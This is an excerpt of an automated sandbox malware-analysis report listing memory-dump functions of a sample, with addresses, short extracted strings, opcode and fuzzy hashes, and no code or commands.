                                                        • Instruction ID: 1b1343826b3bf5aa1af6e10f7933adb155d212f7ce257ad6385f6d638cc3543d
                                                        • Opcode Fuzzy Hash: dac59fdbec4432a23a941eb861a43dc0c93ad647a6a9c872a21398730b597e33
                                                        • Instruction Fuzzy Hash: C5A15512E0F2922BD76377BCA8B60E77FA49F0322872C41B7D1889E4D3DD0E6595C649
                                                        Function 00007FFD345AA270 Relevance: 2.6, Strings: 2, Instructions: 117COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ph4$h4
                                                        • API String ID: 0-849326165
                                                        • Opcode ID: 5d7e18f2cf9bd66daab35db9b611ffa8eee800d9102412938e0d36f6b39197b9
                                                        • Instruction ID: 0165f068f28b1248f5533ab9012b3facfa1073b97717d870e20f4296ed0a6a49
                                                        • Opcode Fuzzy Hash: 5d7e18f2cf9bd66daab35db9b611ffa8eee800d9102412938e0d36f6b39197b9
                                                        • Instruction Fuzzy Hash: 2B419C52E4F6C15BE3938A2448E94AD7BA0EF13248B1800BBD394C70D3E91F69279746
                                                        Function 00007FFD345A13CF Relevance: 1.5, Strings: 1, Instructions: 283COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: /2_^
                                                        • API String ID: 0-1326083298
                                                        • Opcode ID: 9f99502e9a28499ed264ba00ee54a1d7d78ca004593f7f7ee1baf18ad1e61913
                                                        • Instruction ID: 4c7903e17700ca5941a01cbc7bc8ff79f45d1e72b12c2b9f68ef5d9c09691902
                                                        • Opcode Fuzzy Hash: 9f99502e9a28499ed264ba00ee54a1d7d78ca004593f7f7ee1baf18ad1e61913
                                                        • Instruction Fuzzy Hash: 00A14612A0F6D22BD76377BCA8B60E77FA49F0322872C41B7D1888E493DD0E6595C685
                                                        Function 00007FFD345B03FA Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @1_^
                                                        • API String ID: 0-772355566
                                                        • Opcode ID: 17bf2107515d64deb97681c806e130e8e4c8613fc503814f24ad794ed020b94f
                                                        • Instruction ID: ef35be3d9eb13837ef9f1da6f33707602e98219d2b5e5d1808d9426e5df33a48
                                                        • Opcode Fuzzy Hash: 17bf2107515d64deb97681c806e130e8e4c8613fc503814f24ad794ed020b94f
                                                        • Instruction Fuzzy Hash: FE51C823E0D3535AD3237BFCB4620EA7B64AF46329728817BD188DB093CE196586C7D5
                                                        Function 00007FFD343DD840 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2220019522.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd343d0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @nI4
                                                        • API String ID: 0-4162216434
                                                        • Opcode ID: 307a9f68161d97cc1ca847d9a81ec2271e065853dc6e007a162d67b73be3d640
                                                        • Instruction ID: 975475caeb385d146b44a06694f1db343070c8a373a1d6cb41bc5f31460309a1
                                                        • Opcode Fuzzy Hash: 307a9f68161d97cc1ca847d9a81ec2271e065853dc6e007a162d67b73be3d640
                                                        • Instruction Fuzzy Hash: 6B41A543A4FBD29BE763A63858F50F67F91DF1326470900FBC284CB097DA2E6416A352
                                                        Function 00007FFD345AA280 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: h4
                                                        • API String ID: 0-3778585053
                                                        • Opcode ID: 993781d3ee1228e3a6406d84b423c951fea43b5206401d76b22ef3be6afed821
                                                        • Instruction ID: faa8b0de9893445eb6e5ec7e7b877eb838a3e5120900f2e3c1c3a1eb62d577d2
                                                        • Opcode Fuzzy Hash: 993781d3ee1228e3a6406d84b423c951fea43b5206401d76b22ef3be6afed821
                                                        • Instruction Fuzzy Hash: 2841AB62E4F6C15BE393862448EA4A97BA0EF1324CB1800BBD394C70D3E91F69279746
                                                        Function 00007FFD345A0C08 Relevance: .6, Instructions: 607COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7ff726db4d3cf8a6e56ce46b8e73e2afe9b5269587d06fa8b41ea7396da83c95
                                                        • Instruction ID: c5c93e2bda3b5f7618725a5184112d4c0e1dab0c1b1149cb457f630cf27ef1d5
                                                        • Opcode Fuzzy Hash: 7ff726db4d3cf8a6e56ce46b8e73e2afe9b5269587d06fa8b41ea7396da83c95
                                                        • Instruction Fuzzy Hash: 8F128913E0F2925BE763BB7CA8B60E77FA49F0322872C41B7D1889B0D3DD0D65869645
                                                        Function 00007FFD345B0327 Relevance: .3, Instructions: 287COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 676841fed7a2c6f93e29e875bf4bf4991d5fa85f9e625ccfb5e7e191615620c1
                                                        • Instruction ID: c31d07cebb58d1ca9b445f58839d1c84180e9fc60ad4d01fe8adeb7dafe15e6b
                                                        • Opcode Fuzzy Hash: 676841fed7a2c6f93e29e875bf4bf4991d5fa85f9e625ccfb5e7e191615620c1
                                                        • Instruction Fuzzy Hash: 5291CF23E0E7935AD3137BBCF4A20EA7B64EF423297284177C188DA493CE1D6586C791
                                                        Function 00007FFD345A1687 Relevance: .3, Instructions: 256COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4305c300bd0a1db160d8d03a34cf79c112659c94d27be0437e830536535ec228
                                                        • Instruction ID: c1f2d01b58b89717299c475485321ee61d6d439a614d6def605a6c63b2347b7e
                                                        • Opcode Fuzzy Hash: 4305c300bd0a1db160d8d03a34cf79c112659c94d27be0437e830536535ec228
                                                        • Instruction Fuzzy Hash: 2C81CB13A0F29357E753BB7CA8A60E73FA4AF1336872C41B7D1988A0C3DD0D62999645
                                                        Function 00007FFD343DDDAD Relevance: .3, Instructions: 251COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2220019522.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd343d0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2661f72803650c06cc3d16c859410a8307e072e05146717df87521603a483eb6
                                                        • Instruction ID: 5a6d8a23dee3a5719bdededae50127f39997ca67007092e79db62b75b7551d0a
                                                        • Opcode Fuzzy Hash: 2661f72803650c06cc3d16c859410a8307e072e05146717df87521603a483eb6
                                                        • Instruction Fuzzy Hash: A881A570A08A8D8FDBA8EF18C8957F977E5FF5A310F10412AE80DC7291DB75A945CB41
                                                        Function 00007FFD345A8268 Relevance: .2, Instructions: 250COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 65c39e66df1518ce221f5c79e9372ceb0e362ba8e5f57c875fca06169ab6a2ff
                                                        • Instruction ID: 1106a1f5b4ceb6ca4307398dd59ae441df51010eb35bb31c7121c6b7e0a2eaef
                                                        • Opcode Fuzzy Hash: 65c39e66df1518ce221f5c79e9372ceb0e362ba8e5f57c875fca06169ab6a2ff
                                                        • Instruction Fuzzy Hash: FF914E1290F2925BE313BBBCACB54E77F749F02329B2C41B7D04C9F093D91E62858695
                                                        Function 00007FFD345A16FA Relevance: .2, Instructions: 212COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c127afd35fac40f9e0233e6a8edf59d460db5739ac954d9e560d660837f49210
                                                        • Instruction ID: a4adb7eb3c49e886feed8e32a9db08276867feaf20e87981f0ea3a87a485bb2b
                                                        • Opcode Fuzzy Hash: c127afd35fac40f9e0233e6a8edf59d460db5739ac954d9e560d660837f49210
                                                        • Instruction Fuzzy Hash: 9261EC53A0F29357E753BB7CA8A60D73FA4EF13328B2841B7D1988A0C3ED0D61899645
                                                        Function 00007FFD345AACF2 Relevance: .2, Instructions: 167COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2db8c5087b858133add60472d5cb73f21759bc05ef6a79d109267e36d3a8eddc
                                                        • Instruction ID: af34c9c39872bad3817b06d4e976b590f00f632878e24a5602d93328eb16360b
                                                        • Opcode Fuzzy Hash: 2db8c5087b858133add60472d5cb73f21759bc05ef6a79d109267e36d3a8eddc
                                                        • Instruction Fuzzy Hash: 7C51393290F782ABF313EB3CDCA64D67BA4FF01218B084176E1988E093DA2D75558681
                                                        Function 00007FFD343DD7B0 Relevance: .2, Instructions: 162COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2220019522.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd343d0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4cfbef1e00bc74d69e6ce5a7e9c077d85fb85b7c552196a60639c4787d60b626
                                                        • Instruction ID: 5798808a060793bfcb4b2c97bab4120815ea24b2ef7d95b19ab8f964bb3aaf2e
                                                        • Opcode Fuzzy Hash: 4cfbef1e00bc74d69e6ce5a7e9c077d85fb85b7c552196a60639c4787d60b626
                                                        • Instruction Fuzzy Hash: 8951A45394FBC25FE763AA3458A51B67F94EF1321470900FEC284CB0D7DA2E6915E352
                                                        Function 00007FFD345A7E78 Relevance: .1, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e7698243d66af599659213da29d79dcddc725d0ce8582369ca8952be1c04d940
                                                        • Instruction ID: 9302568eec0686ff516b77343b7260b6a90e73b86ad46c0993d826818e68f45d
                                                        • Opcode Fuzzy Hash: e7698243d66af599659213da29d79dcddc725d0ce8582369ca8952be1c04d940
                                                        • Instruction Fuzzy Hash: 52514D17E0E7D26BF7535B3858F10E57FA4EF53314B2904BBC584CA093DA1DA90A9351
                                                        Function 00007FFD343E3DE7 Relevance: .1, Instructions: 142COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2220019522.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd343d0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 927361cec5504c9b8d84f25badf10c26f139c0ad4eede39587fe0c360dfe315c
                                                        • Instruction ID: 56c0f57d0cfee859640831c9f192806f9d797df9d18bebb87a746332883182c4
                                                        • Opcode Fuzzy Hash: 927361cec5504c9b8d84f25badf10c26f139c0ad4eede39587fe0c360dfe315c
                                                        • Instruction Fuzzy Hash: C3419627B0F2922BE752667D6CF60D73BA4EF8326571C10B7D2C4CA043ED1D148B92A2
                                                        Function 00007FFD343DD820 Relevance: .1, Instructions: 124COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2220019522.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd343d0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0fa84f9d1658989c4a9708764ef1d53e3009d08e9ab81283648eecbf2827c306
                                                        • Instruction ID: 7031923f2c0870a77281d6c7b7c8d34c263fab076db6b6aa74b30134a9f1bbfa
                                                        • Opcode Fuzzy Hash: 0fa84f9d1658989c4a9708764ef1d53e3009d08e9ab81283648eecbf2827c306
                                                        • Instruction Fuzzy Hash: B141A75290EBC59FE763AB3858A51F67F91EF13350B0900FEC284C7097DA2E6515E352
                                                        Function 00007FFD343DD830 Relevance: .1, Instructions: 115COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2220019522.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd343d0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 40110a37e8a2fd299a7833d53f6e1bb4927182d507ee32cdfcc3dae94644700e
                                                        • Instruction ID: 2ddcf20de1bddfcaf76a3050d25113db9e56e1aa2461d8443b8ab7e5818f038f
                                                        • Opcode Fuzzy Hash: 40110a37e8a2fd299a7833d53f6e1bb4927182d507ee32cdfcc3dae94644700e
                                                        • Instruction Fuzzy Hash: 3A41A75294EBC69BE763AB3858A51F67F91EF13310B0900FEC284CB097DA2E6515E352
                                                        Function 00007FFD345B04F2 Relevance: .1, Instructions: 105COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7e2613d131f8a44c04330a8b6fc643c4fad005afb6259788185fd9fcb63416a2
                                                        • Instruction ID: b4bd3802d2ab97aa4178524b5479a3620bea7e587560831a71379c073ff81020
                                                        • Opcode Fuzzy Hash: 7e2613d131f8a44c04330a8b6fc643c4fad005afb6259788185fd9fcb63416a2
                                                        • Instruction Fuzzy Hash: 4431DA23E0D75359E3137BFCA4920E5B764AF063297384137C148D6493CE6D758587D4
                                                        Function 00007FFD345A90FA Relevance: .1, Instructions: 104COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 63daa6a23c05c2bb49c7710fdd0c3dbff1e97b8e13190378a38d3bfcad3587da
                                                        • Instruction ID: 354252334a9da0d3a2a21ade1ef038a83b4a942b3699716dda950c45d87490f5
                                                        • Opcode Fuzzy Hash: 63daa6a23c05c2bb49c7710fdd0c3dbff1e97b8e13190378a38d3bfcad3587da
                                                        • Instruction Fuzzy Hash: 6A31C633F067229AD7463BBDF4960DAB364BF85325764423BC10CDB193DB2661938AC5
                                                        Function 00007FFD345B04D4 Relevance: .1, Instructions: 103COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d294d84098a796276053811fbdc0453575e18efedd5d23dcceaa83a8662c8d12
                                                        • Instruction ID: 6a72718471141a30d9647dc7b9edd2dad021145b644beef688c6a624c255bbe8
                                                        • Opcode Fuzzy Hash: d294d84098a796276053811fbdc0453575e18efedd5d23dcceaa83a8662c8d12
                                                        • Instruction Fuzzy Hash: D131FA22E0D3576AE3137FBCA4A20E6BB64AF06719734417BC048D74D3CE69755587D0
                                                        Function 00007FFD345A88FA Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 1_^$1_^$1_^$1_^$1_^$1_^
                                                        • API String ID: 0-1164220096
                                                        • Opcode ID: e36f02b9bd7eb2069923816eb38a10cd535434f514bd6d0003a0d1ff03545c44
                                                        • Instruction ID: 9c04a5a8d497e2c1e9853592b63ac80aa8c82f0922fe42a35acbb1afd1b62b54
                                                        • Opcode Fuzzy Hash: e36f02b9bd7eb2069923816eb38a10cd535434f514bd6d0003a0d1ff03545c44
                                                        • Instruction Fuzzy Hash: 6F412CA3E0E6859BF7A3AB5898E61E977E0FF12318B180076C7489B193FD1D74464286
                                                        Function 00007FFD345AA140 Relevance: 6.3, Strings: 5, Instructions: 89COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @h4$Ph4$`h4$ph4$h4
                                                        • API String ID: 0-3343846692
                                                        • Opcode ID: 86349f9ccc97c842ff7b93a460739deefbe79bd91efc1fd68afade3abd264d3a
                                                        • Instruction ID: d5a92d16f1e292b29822d1c4f52ce14c49652e7b44016c3e32e183be69105564
                                                        • Opcode Fuzzy Hash: 86349f9ccc97c842ff7b93a460739deefbe79bd91efc1fd68afade3abd264d3a
                                                        • Instruction Fuzzy Hash: 7431C292E0FAC17FF3A74D285869139BF91FF8368070840BBD1C4C60D7A91DAD299342
                                                        Function 00007FFD345A86FA Relevance: 5.1, Strings: 4, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 1_^$1_^$1_^$1_^
                                                        • API String ID: 0-2465893738
                                                        • Opcode ID: 92dd0e6eed4abcdeeeacd51abc6652b1a3ceda000e82431fcad5f4dfadead7a1
                                                        • Instruction ID: 56c22eea164e2e2352a072ab960da7eee512f4e8aae432b942900be46be75adc
                                                        • Opcode Fuzzy Hash: 92dd0e6eed4abcdeeeacd51abc6652b1a3ceda000e82431fcad5f4dfadead7a1
                                                        • Instruction Fuzzy Hash: 3021F29291E2868BF3063F6D98524EE3FA0FF12328F590076CBAC4B103F52822488746